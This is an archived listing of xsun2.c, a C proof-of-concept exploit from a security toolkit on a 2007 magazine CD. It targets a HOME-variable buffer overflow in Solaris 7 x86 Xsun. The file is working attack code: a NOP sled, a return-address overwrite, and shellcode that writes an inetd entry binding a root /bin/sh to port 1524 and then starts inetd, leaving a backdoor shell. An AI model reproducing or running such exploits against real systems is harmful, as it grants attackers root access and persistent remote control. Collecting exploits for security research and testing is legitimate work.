Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / xsun2.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 56 lines

/***********************************/ Solaris 7 (x86) /usr/openwin/bin/Xsun HOME environment overflow Proof of Concept Exploitation riley@eeye.com Puts a Root shell on local port 1524 /***********************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFLEN 1041 /* seteuid/setuid/inetd shell */ char eyecode[] = "\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e" "\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c" "\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50" "\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46" "\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56" "\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e" "\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2" "\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff" "\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73" "\x68\x20\x2d\x63\x20" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;" "/usr/sbin/inetd -s /tmp/eeye2001"; char buf[BUFLEN]; unsigned long int nop, esp; long int offset = 0; unsigned long int get_esp() {__asm__("movl %esp,%eax");} int main (int argc, char *argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); else offset = -200; esp = get_esp(); memset(buf, 0x90, BUFLEN); memcpy(buf+800, eyecode, strlen(eyecode)); *((int *) &buf[1037]) = esp+offset; strncpy(&buf[0],"HOME=",5); putenv(buf); execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL); return; } /* www.hack.co.za [15 April 2001]*/